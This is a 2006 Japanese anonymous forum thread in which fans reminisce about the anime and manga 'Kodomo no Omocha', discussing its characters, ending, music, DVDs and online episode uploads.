131 :名無しか・・・何もかも皆懐かしい:2006/04/25(火) 21:17:56 ID:???
アニメのサナのほうが嫌味がなくてよかった。

132 :名無しか・・・何もかも皆懐かしい:2006/04/26(水) 20:01:57 ID:???
アニメは後半説教するヒロインに成り下がったがな・・・
初期の暴走やらかしてた頃はたしかに嫌味なかった。

133 :名無しか・・・何もかも皆懐かしい:2006/04/28(金) 09:02:55 ID:???
千石先生はなんであんなに羽山の事が嫌いなんだ?

134 :名無しか・・・何もかも皆懐かしい:2006/04/28(金) 13:06:00 ID:???
嫌な過去を思い出させたから

135 :名無しか・・・何もかも皆懐かしい:2006/04/28(金) 17:46:05 ID:???
当時小学生の自分はずいぶん羽山くんを意識してた痛い人間でした・・・
先生ごめんなさい。

136 :名無しか・・・何もかも皆懐かしい:2006/04/29(土) 10:03:03 ID:???
今アニマックスでアイシールド21やってたんだけど
人の重さ人形らしきものが一瞬画面に・・・・

137 :名無しか・・・何もかも皆懐かしい:2006/05/01(月) 00:36:22 ID:3n+mNWj1
漫画のこどちゃの最終回ってどーやって終わったんでしたっけ??

138 :名無しか・・・何もかも皆懐かしい:2006/05/01(月) 08:29:06 ID:???
>>137
紗南がこども電話相談室やってて、
アメリカから戻ってきた羽山対面。元羽山家でヤリそうなところで
相談相手の一人から電話かかってきて羽山や剛と一緒に
その子と待ち合わせた喫茶店に向かう。こんな感じ。
最後のコマは「頑張らなくてもいいぞ」という羽山に紗南がピコピコハンマでピコン。


139 :名無しか・・・何もかも皆懐かしい:2006/05/01(月) 22:27:36 ID:???
ばびっと数え歌(英語版)
ファイブ お顔が赤いです 
お熱のあるときゃ休みましょう
のファイブの意味が分かりません。教えてください


140 :名無しか・・・何もかも皆懐かしい:2006/05/01(月) 23:21:43 ID:???
俺も意味不明だった。
「だいぶお顔が赤いです」かな?とか考えてた。

141 :名無しか・・・何もかも皆懐かしい:2006/05/02(火) 00:25:05 ID:???
>>140
ビンゴ!!!

142 :名無しか・・・何もかも皆懐かしい:2006/05/02(火) 02:09:33 ID:???






マジレスしてやるけど

FEVER(熱がある)と FIVE(5)が似てるから。



とかいうのは嘘。
サントラVOL3で(だいぶ)と補足してあった....

143 :名無しか・・・何もかも皆懐かしい:2006/05/02(火) 03:38:47 ID:???
CSのAT−Xで完全版を再放送して欲しいよな。DVDは、カット
されている場面もあるし映像特典も全くない。あとお安いBOXも再販
したりして最初に買った人は完全に負け組だね 大物芸能人が声など
を当てていると契約時点で契約期間が切れたら再放送ができなくなって
しまうので悲しいよな。「姫ちゃんのリボン」「赤ずきんチャチャ」
「こどものおもちゃ」「水色時代」などは再放送は、再契約の金額が
膨大なので放送できない。

144 :名無しか・・・何もかも皆懐かしい:2006/05/02(火) 03:55:16 ID:dKt/VQV+
皆だまされてる。

145 :名無しか・・・何もかも皆懐かしい:2006/05/02(火) 04:45:38 ID:???
「姫ちゃんのリボン」も「赤ずきんチャチャ」 もテレビ大阪で再放送されてる。

146 :名無しか・・・何もかも皆懐かしい:2006/05/02(火) 06:49:41 ID:???
>>145

毎週何曜日の何時から?? 現在では、かなり高額な契約料を払える
CSのアニマックスでさえ放送できないのに地方波は契約の仕方が
別なのかな??? もう一度、確認だけど現在、再放送中ってことです
よね?? でも「されてる」って事は昔に再放送したって事かな??
 それだったら関東だって前にはやっていました。「現在」の再放送
が難しいと書いたつもりだったのですが・・・??

>>144

騙されているとか言っていますが、現在すべて再放送をどこかの
局で放送していますか? 別にお蔵入りってわけではないですよ。
 契約料(放送権)が高いので出来ないのが事実です。
DVDが発売しているから勘違いしている?

147 :名無しか・・・何もかも皆懐かしい:2006/05/02(火) 09:38:27 ID:dKt/VQV+
紗南ちゃんは男。

148 :名無しか・・・何もかも皆懐かしい:2006/05/03(水) 00:06:54 ID:???
SAMデース

149 :名無しか・・・何もかも皆懐かしい:2006/05/03(水) 04:47:06 ID:???
再放送料昔は安かったのに今は高いと主張したいらしいが、
何故いつ頃高くなったのかを書かんと。

150 :名無しか・・・何もかも皆懐かしい:2006/05/03(水) 10:02:05 ID:???
>>137-138
間違ってはいないが、省略しすぎ(w
とりあえず、気になるなら読んどけ>>137

>>143
省略しなきゃいけないようなシーンあったか?
それと、最初に買った人がいたからBOXが安くなったんだよ

151 :名無しか・・・何もかも皆懐かしい:2006/05/03(水) 21:24:55 ID:25dVE/uP
NHKFMagwe

152 :名無しか・・・何もかも皆懐かしい:2006/05/03(水) 23:22:53 ID:???
少六隊フォー!

153 :名無しか・・・何もかも皆懐かしい:2006/05/04(木) 02:15:01 ID:???
小花氏が、単行本で

アニメをしているとき、羽山に憧れている小学生が小花氏にファンレターを出して、剛君にしときなね!って言っておられた

154 :名無しか・・・何もかも皆懐かしい:2006/05/04(木) 02:18:26 ID:???
ん?!
とにかくアニメを見て羽山に憧れているというファンレターを書いた子がいて、単行本に剛君にしとき!みたいな事を言ってたよ

155 :名無しか・・・何もかも皆懐かしい:2006/05/11(木) 04:21:14 ID:8oKjdaaz
あのクライマックスが無ければ神だったのにな・・・

156 :名無しか・・・何もかも皆懐かしい:2006/05/12(金) 02:44:55 ID:???
YouTubeの電通大のエヴァパロディは
既出?

157 :名無しか・・・何もかも皆懐かしい:2006/05/21(日) 13:46:07 ID:L07n5mZW
YouTubeで14話までしかないorzレンタルもしてない…どうすればorz

158 :名無しか・・・何もかも皆懐かしい:2006/05/21(日) 16:31:49 ID:???
監督自身が本当にやりたかったのは「中学生編」のような話だったらしいな。

159 :名無しか・・・何もかも皆懐かしい:2006/05/22(月) 06:25:51 ID:???
「小学生編」のほうが面白かったけどねー。自分には。
風花は好きだけど。

160 :名無しか・・・何もかも皆懐かしい:2006/05/22(月) 20:10:34 ID:???
誰かYouTubeに全話うpしてくれ…

161 :名無しか・・・何もかも皆懐かしい:2006/05/22(月) 20:38:19 ID:???
ビデヲ借りれ

162 :名無しか・・・何もかも皆懐かしい:2006/05/26(金) 15:01:35 ID:???
さっきチチンぷいぷいで風花のテーマがかかってた

163 :名無しか・・・何もかも皆懐かしい:2006/05/26(金) 20:16:07 ID:???
今日Book OffでDVD12本買ってきた。アキバには置いてないんだな。
色々回ったけど、2本しか見つかんなかった。交通費無駄にしたorz


164 :名無しか・・・何もかも皆懐かしい:2006/05/27(土) 22:36:45 ID:???
DVDコレクション買おうか迷ってる
小学生編と中学生編両方買ったら結構な金額になるよなぁ



165 :名無しか・・・何もかも皆懐かしい:2006/05/28(日) 23:23:23 ID:???
163だけど、今日全てのDVD揃った。全部で\30000位の出費だったけど
やっぱり楽しいね!!

166 :名無しか・・・何もかも皆懐かしい:2006/05/29(月) 17:02:29 ID:???
懐かしい…当時リア小だったけど、目覚まし時計の音楽が未だに頭に残ってるよ…
あと冒頭の人物紹介のときのBGM

167 :名無しか・・・何もかも皆懐かしい:2006/05/29(月) 18:12:56 ID:2qJp+4Ir
誰かYouTubeに全話うpしてくれ…

168 :名無しか・・・何もかも皆懐かしい:2006/05/29(月) 22:05:59 ID:???
だれもしらんのか。
YouTubeは今78話まであがってるが
うpした人を友達登録みたいなのしないとだめっぽい
うpしてる人のプロフに書いてある

169 :名無しか・・・何もかも皆懐かしい:2006/05/30(火) 22:13:19 ID:???
>>166
http://syuseki.2-d.jp/minami/src/minami4730.lzh
http://syuseki.2-d.jp/minami/src/minami4731.lzh

170 :名無しか・・・何もかも皆懐かしい:2006/05/30(火) 23:12:45 ID:???
>>168
くわしく

171 :名無しか・・・何もかも皆懐かしい:2006/05/31(水) 08:56:36 ID:???
>>169
俺も好きだったんで再うpしてほしい

172 :名無しか・・・何もかも皆懐かしい:2006/05/31(水) 15:19:49 ID:???
>>170
いつもうpしているてっさ07て人のYouTubeメンバーページ見れ
したら書いてあるから
URLもそこにのってる
英語簡単なのさえわかれば何かいてあるかわかる
わかんなかったら翻訳すれ

173 :サヤヤン・[英] a shampo中:2006/06/01(木) 02:44:48 ID:???
中崎達也ってカッコイイのかな…

174 :名無しか・・・何もかも皆懐かしい:2006/06/01(木) 22:02:00 ID:???
>>171
http://syuseki.2-d.jp/minami/src/minami4839.lzh
http://syuseki.2-d.jp/minami/src/minami4840.lzh

175 :名無しか・・・何もかも皆懐かしい:2006/06/02(金) 22:04:02 ID:???
>>171
DLできましたありがとうございます。

176 ::2006/06/02(金) 22:05:46 ID:???
アンカーミスった
171じゃなて>>174

177 :名無しか・・・何もかも皆懐かしい:2006/06/04(日) 22:30:05 ID:nKUn2RF1
正規DVDはトキオとかぜんじろう出てないの。
海賊版には出てるんだが

178 :サヤヤン・[英]a shampo中:2006/06/05(月) 00:16:14 ID:???
え?どこにでて無いの?

179 :名無しか・・・何もかも皆懐かしい:2006/06/05(月) 14:02:14 ID:???
>>173
教育テレビに出てた頃は普通の男の子って感じだったけど…
今は23〜24くらいか。かっこよくなってそうな気がする。
それにしても今は何してるんだろう。
検索しても最近の彼のことはとんと出てこない。
中崎達也情報求む!

180 :サヤヤン・[英]a shampo中:2006/06/05(月) 14:30:58 ID:???
>>179 ますます見たくなった(^ω^)……かっこよくなくなってそうって…………orz

私からもお願いします。

181 :名無しか・・・何もかも皆懐かしい:2006/06/06(火) 17:30:27 ID:???
ようつべでアニメ見返して懐かしくなって、
原作読み返したら羽山のあまりの健気さ(+不憫さ)に泣けた…
ところで>>168とは別に残りの話数うpしてくれる神はおらんかね…

182 :名無しか・・・何もかも皆懐かしい:2006/06/06(火) 19:53:17 ID:???
>>179-180
>>40に引退って書いてあるね。

>>181
「てっさ」さんて人は今のところ全話うpしてくれそうだから
そこが一番狙い目だと思う。スケジュールも載せてくれてるし。
でももうひとり今17話の途中までうpしてくれてる人がいるよ。
あれ?16話かもしれん。

183 :名無しか・・・何もかも皆懐かしい:2006/06/06(火) 20:02:49 ID:???
17話で合ってたわ。

184 :名無しか・・・何もかも皆懐かしい:2006/06/07(水) 01:19:37 ID:???
>>181
>>172の言う友達登録ってののやり方がよくわからんのだけど無料なのかな…?

185 :名無しか・・・何もかも皆懐かしい:2006/06/08(木) 20:17:41 ID:???
>>182
>>40…ほんとだ…なぜに引退?!
いい声なのになあ。もったいなさ杉!!
今はなんの仕事してるんだろ…またたっちゃんの声で萌えたいよぅ。

186 :名無しか・・・何もかも皆懐かしい:2006/06/10(土) 23:36:02 ID:???
OPはTOKIOのが好きだな。
こどちゃの明るさと影が背景の絵に出てる気がする。
ウルトラリラックスは☆明るい☆ってだけな気も…。
初代だからこそイメージ強いのかもしれない。

187 :名無しか・・・何もかも皆懐かしい:2006/06/13(火) 00:25:01 ID:???
別冊宝島の「このアニメが凄い!」でこの作品の存在を知るまで100%ノーマークだった俺は
中学生編から見始めたので(正確には「港町チャールストン」が登場した「も一度歌って、ワンツ−スリー(だっかかな?))
OP「ウルトラリラックス」、ED「Love Me Deeper」じゃないと落ち着かなかったりする

でも、小学生編を堪能した186のような人の気持ちはよく解る、つ〜か羨ましいwww

188 :名無しか・・・何もかも皆懐かしい:2006/06/16(金) 20:45:59 ID:EiKGm/3i
age

189 :名無しか・・・何もかも皆懐かしい:2006/06/17(土) 18:59:19 ID:???
「私って、オナラ女だわ…。」>by 飛田まゆ

190 :名無しか・・・何もかも皆懐かしい:2006/06/19(月) 21:30:18 ID:???
ヨウツベでまだ4話までしか見てないけど、これEDの入り方いいよな。
イントロが台詞と被るようになってて次はどうなるのかドキドキする。

191 :名無しか・・・何もかも皆懐かしい:2006/06/19(月) 23:42:59 ID:???
監督のこだわりだね>EDの入り方
それがやりたくて、スポンサーにわざわざ頼んだ

つーかわざわざヨウツベ発言すんな

192 :名無しか・・・何もかも皆懐かしい:2006/06/20(火) 04:36:26 ID:???
サブタイ一覧見てたら90話以降の記憶がすっぽり無いことに気づいた。
ので、dvdを買うか借りるかしたいんだが、ちょっと質問させてくれ。
アニメのラストは上のほうにも詳しく書かれてるように原作をベースにした話みたいだが

95:おさまりましたね元のサヤ
96:待っててスグ行く大人の恋

このふたつって羽山とさなのこと?
期待して観て、もし違ってたらショックだ…。

193 :名無しか・・・何もかも皆懐かしい:2006/06/20(火) 08:06:42 ID:???
>>190じゃないが、ヨウツベ発言禁句なの?

194 :名無しか・・・何もかも皆懐かしい:2006/06/20(火) 18:46:09 ID:???
>>192
>95:おさまりましたね元のサヤ
これは風花と高石君のこと。

195 :名無しか・・・何もかも皆懐かしい:2006/06/21(水) 22:43:52 ID:???
♪19時のニ〜ト〜

196 :サヤップェ:2006/06/22(木) 03:20:56 ID:???
>>192

玲くんとアサコのこと(^ω^)

197 :192:2006/06/22(木) 23:32:23 ID:???
>>194>>196
ありがとう。
そうか、うーん…風花と高石くんは正直捨てがたいが
とりあえず12巻だけにしとくかな。

198 :名無しか・・・何もかも皆懐かしい:2006/06/27(火) 13:10:24 ID:3BlWLZ9+
このアニメ感動系の場面で流れるALWAYS BE WITH YOUってテーマが大好きだたなぁ

特に紗南に直澄との関係をみんなで問い詰めて
紗南が勘違いされて傷ついて走り出して秋人に手掴まれて〜って部分は鳥肌モノだったw

199 :名無しか・・・何もかも皆懐かしい:2006/06/28(水) 00:21:14 ID:s5aN9bIS
てっささんとこ行ったら
This user account is suspended.
ってなるんだが…
どうすんだ?

200 :名無しか・・・何もかも皆懐かしい:2006/06/28(水) 01:24:02 ID:???
>>199
あれだけの話数うpしてよく今まで平気だったよね。90以上行ってたでしょ。
本人ももうやんないって言ってるし(大量のリクに若干キレ気味だし)
今後、期待はできないね。

201 :名無しか・・・何もかも皆懐かしい:2006/06/28(水) 01:28:48 ID:s5aN9bIS
昨日初めて借りて読んだこどちゃなのに…
ツタヤ巡るしかないか…。
また第二のネ申の降臨を待つしかないのか…。

202 :名無しか・・・何もかも皆懐かしい:2006/06/28(水) 01:30:01 ID:s5aN9bIS
んで、結局今ようつべで見られるのは、
1,4,15,16,17だけかな?

203 :名無しか・・・何もかも皆懐かしい:2006/06/28(水) 01:33:30 ID:???
買うか借りるかしたほうが絶対早いべ
英字幕は新鮮で面白いがな

204 :名無しか・・・何もかも皆懐かしい:2006/06/29(木) 06:45:20 ID:???
本放送全話録画したテープまだ残ってるが一度も見直してない・・・

205 :名無しか・・・何もかも皆懐かしい:2006/06/29(木) 07:09:09 ID:???
102話もあるとねぇ…

206 :名無しか・・・何もかも皆懐かしい:2006/06/29(木) 08:53:10 ID:???
マンガじゃだめなの?

207 :名無しか・・・何もかも皆懐かしい:2006/06/29(木) 09:14:36 ID:???
いちど英訳された漫画を読んでみたい。
コミック読んだの昔過ぎてどんな風に終わったのか
途切れ途切れにしか思い出せない。
アニメのラストとは違うってのはわかるけど。

208 :名無しか・・・何もかも皆懐かしい:2006/06/30(金) 19:49:02 ID:???
久しぶりに漫画読んだら、やっぱり面白かった
アニメ見たのがきっかけだったんだよなーアニメ見てぇ
CSで再放送やってくれないかな?

209 :名無しか・・・何もかも皆懐かしい:2006/07/02(日) 00:15:48 ID:G+mO16Fm
新たな神が現れたようで。
そのまえに、2,3,5〜14を
補完して頂きたい…

210 :名無しか・・・何もかも皆懐かしい:2006/07/04(火) 20:46:19 ID:???
これ神アニメだよな。でもそこまで人気ないみたいだな。
でもアニメ以上に長いし。

211 :名無しか・・・何もかも皆懐かしい:2006/07/04(火) 22:14:51 ID:???
ようつべで見てみた。懐かしい〜

当時、たまにしか見てなくて、ちゃんと見始めたのはもう終わりの方だったかも
サナの父親が出てたのは覚えてたけど、ナオズミの両親とかもアニメには出てたのか


212 :名無しか・・・何もかも皆懐かしい:2006/07/07(金) 13:27:55 ID:oRuyioBR
これ鳥肌

213 :名無しか・・・何もかも皆懐かしい:2006/07/07(金) 16:24:53 ID:???
直澄くんの両親つーか、ニューヨーク編はチョット…。

でも最終回で一家で直澄くんを頼ってきてたのにはワロス
紗南は中学生のときより小学生のときのほうが精神年齢が上っぽい。

214 :名無しか・・・何もかも皆懐かしい:2006/07/07(金) 20:31:35 ID:sHU1yJF8
ニューヨーク編から見始めたから最初は、紗南と直澄が付き合ってるのかと思ってた。
ニューヨークから帰ってきて羽山と会ったときに2人で見つめ合って同時に告白しようとした
のは覚えてる。マンガも読んでみたいが男なので買えない・・・姉や妹がいれば
読めたのかも知れないが・・・ここに書き込んでるのもやっぱり女の子が多い?


215 :名無しか・・・何もかも皆懐かしい:2006/07/07(金) 23:13:35 ID:???
今更ながら、LD->DVD焼中(40話付近)

1-19話までが全てのような気もするが(原作もそういう感じ)...
それでも、アニメは頑張ってた、という感じかもなぁ

小花氏も、最後に「ばびっと」描いてくれてたのには感激するから
>>214もちゃんと買うように(高い完全版コミックスが出てるぞ)
原作者は、「りぼん」らしくない漫画家なので他の漫画も
とりあえずお勧めw

216 :名無しか・・・何もかも皆懐かしい:2006/07/08(土) 06:11:27 ID:???
アニメでは、紗南の髪型を殆どツインテールにしてたな。
あれは監督(大地丙太郎氏)のお好みなの?
原作では色々と変えてた気がするけど(手元にないのでうろ覚え)

>>215
「水の舘」「猫の島」「パートナー」もいいね。お勧め。


217 :名無しか・・・何もかも皆懐かしい:2006/07/09(日) 12:19:59 ID:???
25話面白そうだな。影薄いまみちゃんの話みたいだし。

218 :名無しか・・・何もかも皆懐かしい:2006/07/09(日) 17:40:55 ID:???
>>214
こどちゃの漫画は買って損ないと思うよ。
私は買った時は既に大人だったが、男性は買いにくいのか?
個人的には、こどちゃ以外の小花作品は好みが別れると思う。
私は他の作品はイマイチだった。

219 :名無しか・・・何もかも皆懐かしい:2006/07/11(火) 17:54:54 ID:???
男だがTVで当時見てた。
本当に思い入れのある作品だったので
古本で全巻まとめ買いしたw

皆も是非、新巻でも古本でも大人買いしてみてくれww

220 :名無しか・・・何もかも皆懐かしい:2006/07/14(金) 10:41:10 ID:???
バビットうぜー

221 :名無しか・・・何もかも皆懐かしい:2006/07/14(金) 16:10:34 ID:???
http://www.youtube.com/watch?v=l90zqOcBknw&search=ultra%20relax

222 :名無しか・・・何もかも皆懐かしい:2006/07/14(金) 18:22:11 ID:???
国はポーランドか?
右のデカイ女がかわいいかな

223 :名無しか・・・何もかも皆懐かしい:2006/07/15(土) 03:25:46 ID:???
>>198
ハゲドウ、あの曲かなり好き。
特にアレンジというかパターンも色々あってコメディ部分でも使えるのがまた有効的。

224 :名無しか・・・何もかも皆懐かしい:2006/07/15(土) 04:23:32 ID:???
ALWAYS BE WITH YOUも僕等がいたで流れてくれんかなぁ・・・

225 :名無しか・・・何もかも皆懐かしい:2006/07/19(水) 08:21:10 ID:???
男だが当時アニメ見てハマリりぼん買ってみて単行本買ってアニメ雑誌も買い始めてサントラも買ってアニメのサブタイトルもほとんど覚えていた。
その後アニメから離れた期間があったが、漏れの発端クサイ作品だな。
第一期のEDはまさに四苦八苦した歌だ。

226 :名無しか・・・何もかも皆懐かしい:2006/07/19(水) 17:24:43 ID:???
アニメをツタヤでかりて全部見ました!でその後、原作読んだけど
結構違うね。
小学生の時はアニメをよく見てて原作はりぼんで最後の方は知ってたけど
私には原作(羽山の右手のこと→ラストにかけて)は重いなぁって思った。
アニメは羽山の声が好きだなー。

227 :名無しか・・・何もかも皆懐かしい:2006/07/28(金) 16:39:21 ID:???
ttp://www.geocities.jp/syo9590/oda.zip

228 :名無しか・・・何もかも皆懐かしい:2006/07/31(月) 09:49:30 ID:???
>>227
イイ!

紗南のテンション高いところが大好き!!

229 :名無しか・・・何もかも皆懐かしい:2006/08/05(土) 12:05:11 ID:???
age

230 :名無しか・・・何もかも皆懐かしい:2006/08/06(日) 01:45:05 ID:/sqhnuuQ
オールウェイズビーウィズユーの着うた欲しい

231 :名無しか・・・何もかも皆懐かしい:2006/08/06(日) 15:00:14 ID:cY64TvQM
オールウェイズは作中に頻繁に流れていたあれ?
テンポによってあそこまで雰囲気変わる曲ってそうないよね
ちなみに自分はオルゴールみたいなスローテンポのオールウェイズが好き
サントラほしいと思ったのジブリ以来
『あーちゃんを産んで・・・』は今でも泣ける
マンガ大人買いしちゃおうかなぁ

232 :名無しか・・・何もかも皆懐かしい:2006/08/07(月) 10:30:52 ID:???
マンガとアニメ、結構雰囲気が違うんだよね。
確かにサントラほすい……

233 :名無しか・・・何もかも皆懐かしい:2006/08/07(月) 12:57:11 ID:???
中華で4枚は揃えられる

234 :名無しか・・・何もかも皆懐かしい:2006/08/09(水) 09:13:43 ID:???
ttp://124.38.226.50/bbs/31564/img/0030517011.3gp

235 :名無しか・・・何もかも皆懐かしい:2006/08/11(金) 00:52:35 ID:???
りりかのキャラが出てくるのって何話だっけ?

236 :名無しか・・・何もかも皆懐かしい:2006/08/11(金) 01:50:59 ID:???
少六隊?なら34話

237 :名無しか・・・何もかも皆懐かしい:2006/08/12(土) 13:31:29 ID:???
289 名前:TR-774 [] 投稿日:2006/07/08(土) 13:31:38 ID:ULN11Xq3
少年律動体操
http://www.youtube.com/watch?v=Nw2anJlvg9Q


238 :名無しか・・・何もかも皆懐かしい:2006/08/15(火) 23:19:39 ID:uhkJdsTO
DVD投売りだったので何枚か買って見てたんですけど
ウルトラリラックスのオープニング最後に石像にもう一度近づくシーンなかったですかね?
テレビで見たときは提供テロップが出てあったように記憶しているんですが。
また、この話は102話で終了なんでしょうか?
エンディング見るとまだ話続きそうなんですが。

239 :名無しか・・・何もかも皆懐かしい:2006/08/16(水) 22:53:00 ID:???
>>238
篠原ともえの石像が倒れて、紗南が、で終わりだろ。




提供テロップで4人の原始人が近づいて「ばびっと」の石像が倒れてきてた。
映像特典にあったな(LD-BOX分だけど)
102話で終わったけど、キャラ達はまだまだ頑張ってるという意味で続いてる
ようなラストだな。

240 :名無しか・・・何もかも皆懐かしい:2006/08/18(金) 02:34:20 ID:HkATMsRE
サナサンバで元気よーく

241 :名無しか・・・何もかも皆懐かしい:2006/08/18(金) 12:30:58 ID:nwBOn0mk
ばびっと!!!

242 :名無しか・・・何もかも皆懐かしい:2006/08/19(土) 09:45:25 ID:???
羽山が好きなんです。
恋をしました

羽山に似た人、探す

243 :名無しか・・・何もかも皆懐かしい:2006/08/22(火) 22:42:34 ID:lYaoz4hM
中一に恋ですか?小六に恋ですか?貴方の近くの剛くんに気づいてあげなさい。

244 :242:2006/08/23(水) 11:43:16 ID:???
そうですね。中1・・なんてショタコンですよね。KOOLな人を探します。

245 :名無しか・・・何もかも皆懐かしい:2006/08/26(土) 19:15:21 ID:???
久しぶり一話から借りてみた!

246 :名無しか・・・何もかも皆懐かしい:2006/08/27(日) 10:38:58 ID:???
風花が目を怪我して、病院で聞いていた、落としたテープに…

247 :名無しか・・・何もかも皆懐かしい:2006/09/03(日) 04:39:28 ID:???
いいじゃんか恋したって割り切れるなら(漫画と現実を)

あんな中一や小学生現在この世の中にいないしね
ちくしょー漫画っていいなぁーーー!! 

248 :名無しか・・・何もかも皆懐かしい:2006/09/03(日) 04:42:46 ID:???
続き

個人的には漫画もアニメも好きだよ
漫画のほうがシリアスだけど色々と考えさせられる漫画だった・。
少女漫画では結構珍しいタイプだと思う。

アニメは好きだが羽山が風化とちょとラブりすぎかな
漫画みたいなサナちゃんじゃなきゃ駄目!て気持ちが
あまりアニメでは伝わらなかった。
   

249 :名無しか・・・何もかも皆懐かしい:2006/09/03(日) 16:27:21 ID:Cgl+jZyi
ようつべに最終回ねーの?

250 :名無しか・・・何もかも皆懐かしい:2006/09/03(日) 17:13:55 ID:HTg5xeTO
秋人の季節がやってきたどー!!

251 :名無しか・・・何もかも皆懐かしい:2006/09/03(日) 17:17:07 ID:???
>>248
自分は風花とラブラブしてる羽山が痛々しかったな。
紗南とのすれちがいやタイミングの悪さ、いろいろな成り行きで風花と
つきあったけれど、羽山が風花のほうを向こうとすればするほど、
羽山には紗南しかいないと思えた。

紗南への気持ちは恋愛感情で、風花へは誠意と努力と責任感。

でも形の上でも風花とあそこまでラブラブさせたんだから、
最終回では羽山と紗南をはっきりとくっつけてほしかったな。
それがみたかった。
小学生編の羽山と紗南のほうがよほどひっついてた。


252 :名無しか・・・何もかも皆懐かしい:2006/09/03(日) 18:57:08 ID:???
>>251
それは言えてる
ちゃんと最終回で羽山とサナちゃんをくっつけてほしかった。

風化はえっとー誰だっけ名前忘れた関西の男の子
とちゃんとくっついたのになーーー

私も風化に対しての気持ちは恋愛感情ではないと思っているが
アニメではなんか伝わりにくかったのが個人的に残念だったのよ

 

253 :名無しか・・・何もかも皆懐かしい:2006/09/04(月) 14:51:49 ID:???
こどちゃ懐かしい〜と思って昨日完徹で全巻読んだ自分
りぼんで連載中から読んでたから、一番最初に好きになった漫画だな
兄も読んでてアニメも最初の方は見てたけど後から見なくなった…
結構評判いいみたいだから今度見てみます。

漫画の方だけど、私は小学生編も中学生編もどっちも好き
小花先生は明るいギャグも暗くてドロドロした話もどっちも上手だなぁと思う

254 :名無しか・・・何もかも皆懐かしい:2006/09/06(水) 12:43:00 ID:???
http://www.geocities.co.jp/harmonyofwater/kodocha3-3.htm

255 :名無しか・・・何もかも皆懐かしい:2006/09/09(土) 20:15:43 ID:ByyYzVOF
保留

256 :名無しか・・・何もかも皆懐かしい:2006/09/11(月) 11:08:43 ID:MS9nESBK
アニメはラップがよかったな。
ノリノリマシーン買っておけばよかった・・・

257 :名無しか・・・何もかも皆懐かしい:2006/09/14(木) 10:16:08 ID:QAQ02as0
ヘイヘイ

258 :名無しか・・・何もかも皆懐かしい:2006/09/16(土) 12:54:42 ID:oQtqa5jS
N速+で神IDキタ━━━━━━(゚∀゚)━━━━━━ !!!!!


http://news19.2ch.net/test/read.cgi/newsplus/1158364074/583
583 名前:名無しさん@6周年 投稿日:2006/09/16(土) 12:02:57 ID:kODOchZ50
>>572                                        ↑
寒流パチンコの回と悪徳弁護士の回はマジで吹いた(w
流石、「はれぶた」のコンビだわ(w

259 :名無しか・・・何もかも皆懐かしい:2006/09/17(日) 08:08:00 ID:???
コレはおもしろいね^^;

260 :名無しか・・・何もかも皆懐かしい:2006/09/19(火) 17:34:57 ID:NmcpH2hh
ノリノリマシンでバリバリ絶好調〜を歌っているのは何巻ですか?

261 :名無しか・・・何もかも皆懐かしい:2006/09/20(水) 21:34:06 ID:???
私もこの漫画大好きでした!またやってくれないかな…漫画で。アニメも借りて見ようと!

262 :名無しか・・・何もかも皆懐かしい:2006/09/28(木) 15:31:24 ID:???
レッツリンボー!!

263 :名無しか・・・何もかも皆懐かしい:2006/10/03(火) 17:09:18 ID:???
 

264 :名無しか・・・何もかも皆懐かしい:2006/10/04(水) 07:35:52 ID:8aidWA2d
とりやまくん

265 :名無しか・・・何もかも皆懐かしい:2006/10/04(水) 13:17:25 ID:???
いろいろすれ違ってNYに旅立つ時、オールウェイズが流れるシーンで泣いた。
直純くんが紗南ちゃんの手を握るところとか…。

直純くん、苦しい恋してるのね。いい奴だな。

266 :名無しか・・・何もかも皆懐かしい:2006/10/08(日) 12:05:13 ID:???
http://www.uploda.net/cgi/uploader1/index.php?file_id=0000159042.mp3

267 :名無しか・・・何もかも皆懐かしい:2006/10/12(木) 00:17:30 ID:???
アニメで直澄くんと紗南ちゃんがキスしたって本当?

本当なら詳しくよろしくお願いします<(__)>

268 :名無しか・・・何もかも皆懐かしい:2006/10/12(木) 01:17:53 ID:???
今さらだがNHKのアニメ見たらOPで紗南ちゃん
出てきてびっくりした。つい最後まで見ちゃったよ。

269 :名無しか・・・何もかも皆懐かしい:2006/10/12(木) 04:53:24 ID:???
NHKのアニメって何のこと?

270 :名無しか・・・何もかも皆懐かしい:2006/10/12(木) 04:55:57 ID:???

つ 学園アリス

271 :名無しか・・・何もかも皆懐かしい:2006/10/17(火) 04:27:55 ID:???
この前ビデオレンタルしたんですが、
中学生篇の最後の巻(vol12)の最後の最後にある
直澄くんの親が破産してたり、紗南が
『暴力で人の心は動かないのよ!!』って叫んでる
VTRは何なんでしょうか...?

272 :名無しか・・・何もかも皆懐かしい:2006/10/17(火) 11:11:23 ID:???
・【福岡・中2自殺】 「先生のいじめ発言がいじめ拡大の発端だが、自殺には直接関係ない」 校長、会見★7
 http://news19.2ch.net/test/read.cgi/newsplus/1161016177/
・【福岡・中2自殺】 担任、自殺生徒に「偽善者だ」…女子生徒らにも「太っているから豚」「とよのか」「出荷不可」★10
 http://news19.2ch.net/test/read.cgi/newsplus/1161011910/
・【福岡・中2自殺】 「からかいやすかった」 担任教諭も、生徒をいじめる…"いじめ発生"の発端か★5
 http://news19.2ch.net/test/read.cgi/newsplus/1160961424/

↑見てたらこどちゃ思い出した。悪ふざけじゃなくて貼ってみた。
紗南ちゃん出番です。


273 :名無しか・・・何もかも皆懐かしい:2006/10/17(火) 22:08:10 ID:???
私も、この教師の事聞いて、
羽山の中学の担任のなんとかいう人のこと思い出した。
私だけじゃなかったんだww

きっと紗南ちゃんだけでなく、羽山も出番です。

274 :3:2006/10/19(木) 20:28:15 ID:???
情報
http://ic.39.kg/prin/giku.htm

275 :名無しか・・・何もかも皆懐かしい:2006/10/19(木) 20:44:05 ID:M8UEeSCt
ブラッドって何歳?

276 :名無しか・・・何もかも皆懐かしい:2006/10/22(日) 03:27:48 ID:???
>273
千石だろ。嫌い嫌い。福岡の件より今一挙再放送やってるふたつのスピカの佐野を見てると千石を思い出すよ。
千石も佐野も嫌い嫌い。

277 :名無しか・・・何もかも皆懐かしい:2006/10/25(水) 03:15:09 ID:UAjmalbC
ノピアで歌ってる回をできるだけ教えてください。


http://www.youtube.com/watch?v=iHt92FBGCRw&mode=related&search=
母の破産説明バージョン
http://www.youtube.com/watch?v=yNh6TNBBbUQ&mode=related&search=
まんなかバースデーはクリスマスイブ
http://www.youtube.com/watch?v=6gK25zPeAPU&mode=related&search=
バレンタインデー今年は1つ

278 :名無しか・・・何もかも皆懐かしい:2006/10/25(水) 03:45:11 ID:???
え、これアニメでははっきりくっつかなくて終わったの?
原作はあんなにラブで終わったのに

279 :名無しか・・・何もかも皆懐かしい:2006/10/25(水) 09:49:29 ID:nvk739HW
